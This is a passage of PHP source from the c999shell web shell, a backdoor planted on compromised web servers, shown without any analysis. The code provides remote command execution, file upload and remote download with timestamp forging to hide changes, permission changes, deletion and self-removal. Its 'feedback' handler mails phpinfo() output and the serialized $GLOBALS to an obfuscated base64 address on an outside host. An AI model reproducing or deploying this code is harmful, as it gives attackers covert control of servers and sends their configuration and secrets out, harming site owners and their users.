1570 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
1571 foreach(array("md5","crypt","sha1","crc32") as $v)
1572 {
1573 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
1574 }
1575 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
1576 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
1577 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
1578 echo "<center>base64_decode - ";
1579 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
1580 else
1581 {
1582 $debase64 = base64_decode($encoder_input);
1583 $debase64 = str_replace("\0","[0]",$debase64);
1584 $a = explode("\r\n",$debase64);
1585 $rows = count($a);
1586 $debase64 = htmlspecialchars($debase64);
1587 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
1588 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
1589 echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
1590 }
1591 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
1592 $c = strlen($encoder_input);
1593 for($i=0;$i<$c;$i++)
1594 {
1595 $hex = dechex(ord($encoder_input[$i]));
1596 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
1597 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
1598 }
1599 echo "\" readonly><br></center></form>";
1600}
1601if ($act == "fsbuff")
1602{
1603 $arr_copy = $sess_data["copy"];
1604 $arr_cut = $sess_data["cut"];
1605 $arr = array_merge($arr_copy,$arr_cut);
1606 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
1607 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
1608}
1609if ($act == "selfremove")
1610{
1611 if (($submit == $rndcode) and ($submit != ""))
1612 {
1613 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
1614 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
1615 }
1616 else
1617 {
1618 if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
1619 $rnd = rand(0,9).rand(0,9).rand(0,9);
1620 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
1621 }
1622}
1623if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
1624if ($act == "feedback")
1625{
1626 $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
1627 if (!empty($submit))
1628 {
1629 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1630 $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1631 if (!empty($fdbk_ref))
1632 {
1633 $tmp = @ob_get_contents();
1634 ob_clean();
1635 phpinfo();
1636 $phpinfo = base64_encode(ob_get_contents());
1637 ob_clean();
1638 echo $tmp;
1639 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1640 }
1641 mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
1642 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1643 }
1644 else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
1645}
1646if ($act == "search")
1647{
1648 echo "<b>Search in file-system:</b><br>";
1649 if (empty($search_in)) {$search_in = $d;}
1650 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1651 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1652 if (!empty($submit))
1653 {
1654 $found = array();
1655 $found_d = 0;
1656 $found_f = 0;
1657 $search_i_f = 0;
1658 $search_i_d = 0;
1659 $a = array
1660 (
1661 "name"=>$search_name, "name_regexp"=>$search_name_regexp,
1662 "text"=>$search_text, "text_regexp"=>$search_text_regxp,
1663 "text_wwo"=>$search_text_wwo,
1664 "text_cs"=>$search_text_cs,
1665 "text_not"=>$search_text_not
1666 );
1667 $searchtime = getmicrotime();
1668 $in = array_unique(explode(";",$search_in));
1669 foreach($in as $v) {c999fsearch($v);}
1670 $searchtime = round(getmicrotime()-$searchtime,4);
1671 if (count($found) == 0) {echo "<b>No files found!</b>";}
1672 else
1673 {
1674 $ls_arr = $found;
1675 $disp_fullpath = TRUE;
1676 $act = "ls";
1677 }
1678 }
1679 echo "<form method=POST>
1680<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
1681<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
1682<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
1683<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
1684<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
1685&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
1686&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
1687&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
1688<br><br><input type=submit name=submit value=\"Search\"></form>";
1689 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
1690}
1691if ($act == "chmod")
1692{
1693 $mode = fileperms($d.$f);
1694 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1695 else
1696 {
1697 $form = TRUE;
1698 if ($chmod_submit)
1699 {
1700 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1701 if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
1702 else {$err = "Can't chmod to ".$octet.".";}
1703 }
1704 if ($form)
1705 {
1706 $perms = parse_perms($mode);
1707 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
1708 }
1709 }
1710}
1711if ($act == "upload")
1712{
1713 $uploadmess = "";
1714 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
1715 if (empty($uploadpath)) {$uploadpath = $d;}
1716 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
1717 if (!empty($submit))
1718 {
1719 global $HTTP_POST_FILES;
1720 $uploadfile = $HTTP_POST_FILES["uploadfile"];
1721 if (!empty($uploadfile["tmp_name"]))
1722 {
1723 if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
1724 else {$destin = $userfilename;}
1725 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
1726 }
1727 elseif (!empty($uploadurl))
1728 {
1729 if (!empty($uploadfilename)) {$destin = $uploadfilename;}
1730 else
1731 {
1732 $destin = explode("/",$destin);
1733 $destin = $destin[count($destin)-1];
1734 if (empty($destin))
1735 {
1736 $i = 0;
1737 $b = "";
1738 while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
1739 }
1740 if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
1741 else
1742 {
1743 $st = getmicrotime();
1744 $content = @file_get_contents($uploadurl);
1745 $dt = round(getmicrotime()-$st,4);
1746 if (!$content) {$uploadmess .= "Can't download file!<br>";}
1747 else
1748 {
1749 if ($filestealth) {$stat = stat($uploadpath.$destin);}
1750 $fp = fopen($uploadpath.$destin,"w");
1751 if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
1752 else
1753 {
1754 fwrite($fp,$content,strlen($content));
1755 fclose($fp);
1756 if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
1757 }
1758 }
1759 }
1760 }
1761 }
1762 if ($miniform)
1763 {
1764 echo "<b>".$uploadmess."</b>";
1765 $act = "ls";
1766 }
1767 else
1768 {
1769 echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
1770Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
1771Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
1772Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
1773File-name (auto-fill): <input name=uploadfilename size=25><br><br>
1774<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
1775<input type=submit name=submit value=\"Upload\">
1776</form>";
1777 }
1778}
1779if ($act == "delete")
1780{
1781 $delerr = "";
1782 foreach ($actbox as $v)
1783 {
1784 $result = FALSE;
1785 $result = fs_rmobj($v);
1786 if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
1787 }
1788 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
1789 $act = "ls";
1790}
1791if (!$usefsbuff)
1792{
1793 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
1794}
1795else
1796{
1797 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
1798 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
1799 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
1800 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
1801 elseif ($actpastebuff)
1802 {
1803 $psterr = "";
1804 foreach($sess_data["copy"] as $k=>$v)
1805 {
1806 $to = $d.basename($v);
1807 if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1808 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1809 }
1810 foreach($sess_data["cut"] as $k=>$v)
1811 {
1812 $to = $d.basename($v);
1813 if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1814 unset($sess_data["cut"][$k]);
1815 }
1816 c999_sess_put($sess_data);
1817 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1818 $act = "ls";
1819 }
1820 elseif ($actarcbuff)
1821 {
1822 $arcerr = "";
1823 if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
1824 else {$ext = ".tar.gz";}
1825 if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
1826 $cmdline .= " ".$actarcbuff_path;
1827 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1828 foreach($objects as $v)
1829 {
1830 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1831 if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
1832 if (is_dir($v))
1833 {
1834 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1835 $v .= "*";
1836 }
1837 $cmdline .= " ".$v;
1838 }
1839 $tmp = realpath(".");
1840 chdir($d);
1841 $ret = myshellexec($cmdline);
1842 chdir($tmp);
1843 if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
1844 $ret = str_replace("\r\n","\n",$ret);
1845 $ret = explode("\n",$ret);
1846 if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
1847 foreach($sess_data["cut"] as $k=>$v)
1848 {
1849 if (in_array($v,$ret)) {fs_rmobj($v);}
1850 unset($sess_data["cut"][$k]);
1851 }
1852 c999_sess_put($sess_data);
1853 if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
1854 $act = "ls";
1855 }
1856 elseif ($actpastebuff)
1857 {
1858 $psterr = "";
1859 foreach($sess_data["copy"] as $k=>$v)
1860 {
1861 $to = $d.basename($v);
1862 if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
1863 if ($copy_unset) {unset($sess_data["copy"][$k]);}
1864 }
1865 foreach($sess_data["cut"] as $k=>$v)
1866 {
1867 $to = $d.basename($v);
1868 if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
1869 unset($sess_data["cut"][$k]);
1870 }
1871 c999_sess_put($sess_data);
1872 if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
1873 $act = "ls";
1874 }
1875}
1876if ($act == "cmd")
1877{
1878if (trim($cmd) == "ps -aux") {$act = "processes";}
1879elseif (trim($cmd) == "tasklist") {$act = "processes";}
1880else
1881{
1882 @chdir($chdir);
1883 if (!empty($submit))
1884 {
1885 echo "<b>Result of execution this command</b>:<br>";
1886 $olddir = realpath(".");
1887 @chdir($d);
1888 $ret = myshellexec($cmd);
1889 $ret = convert_cyr_string($ret,"d","w");
1890 if ($cmd_txt)
1891 {
1892 $rows = count(explode("\r\n",$ret))+1;
1893 if ($rows < 10) {$rows = 10;}
1894 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
1895 }
1896 else {echo $ret."<br>";}
1897 @chdir($olddir);
1898 }
1899 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
1900 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
1901}
1902}
1903if ($act == "ls")
1904{
1905 if (count($ls_arr) > 0) {$list = $ls_arr;}
1906 else
1907 {
1908 $list = array();
1909 if ($h = @opendir($d))
1910 {
1911 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
1912 closedir($h);
1913 }
1914 else {}
1915 }
1916 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
1917 else
1918 {
1919 //Building array
1920 $objects = array();
1921 $vd = "f"; //Viewing mode
1922 if ($vd == "f")
1923 {
1924 $objects["head"] = array();
1925 $objects["folders"] = array();
1926 $objects["links"] = array();
1927 $objects["files"] = array();
1928 foreach ($list as $v)
1929 {
1930 $o = basename($v);
1931 $row = array();
1932 if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
1933 elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
1934 elseif (is_dir($v))
1935 {
1936 if (is_link($v)) {$type = "LINK";}
1937 else {$type = "DIR";}
1938 $row[] = $v;
1939 $row[] = $type;
1940 }
1941 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
1942 $row[] = filemtime($v);
1943 if (!$win)
1944 {
1945 $ow = posix_getpwuid(fileowner($v));
1946 $gr = posix_getgrgid(filegroup($v));
1947 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1948 }
1949 $row[] = fileperms($v);
1950 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1951 elseif (is_link($v)) {$objects["links"][] = $row;}
1952 elseif (is_dir($v)) {$objects["folders"][] = $row;}
1953 elseif (is_file($v)) {$objects["files"][] = $row;}
1954 $i++;
1955 }
1956 $row = array();
1957 $row[] = "<b>Name</b>";
1958 $row[] = "<b>Size</b>";
1959 $row[] = "<b>Modify</b>";
1960 if (!$win)
1961 {$row[] = "<b>Owner/Group</b>";}
1962 $row[] = "<b>Perms</b>";
1963 $row[] = "<b>Action</b>";
1964 $parsesort = parsesort($sort);
1965 $sort = $parsesort[0].$parsesort[1];
1966 $k = $parsesort[0];
1967 if ($parsesort[1] != "a") {$parsesort[1] = "d";}
1968 $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
1969 $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
1970 $row[$k] .= $y;
1971 for($i=0;$i<count($row)-1;$i++)
1972 {
1973 if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
1974 }
1975 $v = $parsesort[0];
1976 usort($objects["folders"], "tabsort");
1977 usort($objects["links"], "tabsort");
1978 usort($objects["files"], "tabsort");
1979 if ($parsesort[1] == "d")
1980 {
1981 $objects["folders"] = array_reverse($objects["folders"]);
1982 $objects["files"] = array_reverse($objects["files"]);
1983 }
1984 $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
1985 $tab = array();
1986 $tab["cols"] = array($row);
1987 $tab["head"] = array();
1988 $tab["folders"] = array();
1989 $tab["links"] = array();
1990 $tab["files"] = array();
1991 $i = 0;
1992 foreach ($objects as $a)
1993 {
1994 $v = $a[0];
1995 $o = basename($v);
1996 $dir = dirname($v);
1997 if ($disp_fullpath) {$disppath = $v;}
1998 else {$disppath = $o;}
1999 $disppath = str2mini($disppath,60);
2000 if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
2001 elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
2002 foreach ($regxp_highlight as $r)
2003 {
2004 if (ereg($r[0],$o))
2005 {
2006 if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}
2007 else
2008 {
2009 $r[1] = round($r[1]);
2010 $isdir = is_dir($v);
2011 if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
2012 {
2013 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
2014 $disppath = $r[2].$disppath.$r[3];
2015 if ($r[4]) {break;}
2016 }
2017 }
2018 }
2019 }
2020 $uo = urlencode($o);
2021 $ud = urlencode($dir);
2022 $uv = urlencode($v);
2023 $row = array();
2024 if ($o == ".")
2025 {
2026 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2027 $row[] = "LINK";
2028 }
2029 elseif ($o == "..")
2030 {
2031 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
2032 $row[] = "LINK";
2033 }
2034 elseif (is_dir($v))
2035 {
2036 if (is_link($v))
2037 {
2038 $disppath .= " => ".readlink($v);
2039 $type = "LINK";
2040 $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2041 }
2042 else
2043 {
2044 $type = "DIR";
2045 $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
2046 }
2047 $row[] = $type;
2048 }
2049 elseif(is_file($v))
2050 {
2051 $ext = explode(".",$o);
2052 $c = count($ext)-1;
2053 $ext = $ext[$c];
2054 $ext = strtolower($ext);
2055 $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
2056 $row[] = view_size($a[1]);
2057 }
2058 $row[] = date("d.m.Y H:i:s",$a[2]);
2059 if (!$win) {$row[] = $a[3];}
2060 $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
2061 if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
2062 else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
2063 if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
2064 else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
2065 if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
2066 elseif (is_link($v)) {$tab["links"][] = $row;}
2067 elseif (is_dir($v)) {$tab["folders"][] = $row;}
2068 elseif (is_file($v)) {$tab["files"][] = $row;}
2069 $i++;
2070 }
2071 }
2072 // Compiling table
2073 $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
2074 echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
2075 foreach($table as $row)
2076 {
2077 echo "<tr>\r\n";
2078 foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
2079 echo "</tr>\r\n";
2080 }
2081 echo "</table><hr size=\"1\" noshade><p align=\"right\">
2082 <script>
2083 function ls_setcheckboxall(status)
2084 {
2085 var id = 1;
2086 var num = ".(count($table)-2).";
2087 while (id <= num)
2088 {
2089 document.getElementById('actbox'+id).checked = status;
2090 id++;
2091 }
2092 }
2093 function ls_reverse_all()
2094 {
2095 var id = 1;
2096 var num = ".(count($table)-2).";
2097 while (id <= num)
2098 {
2099 document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
2100 id++;
2101 }
2102 }
2103 </script>
2104 <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
2105 <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
2106 if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
2107 {
2108 echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
2109 }
2110 echo "<select name=act><option value=\"".$act."\">With selected:</option>";
2111 echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
2112 echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
2113 if ($usefsbuff)
2114 {
2115 echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
2116 echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
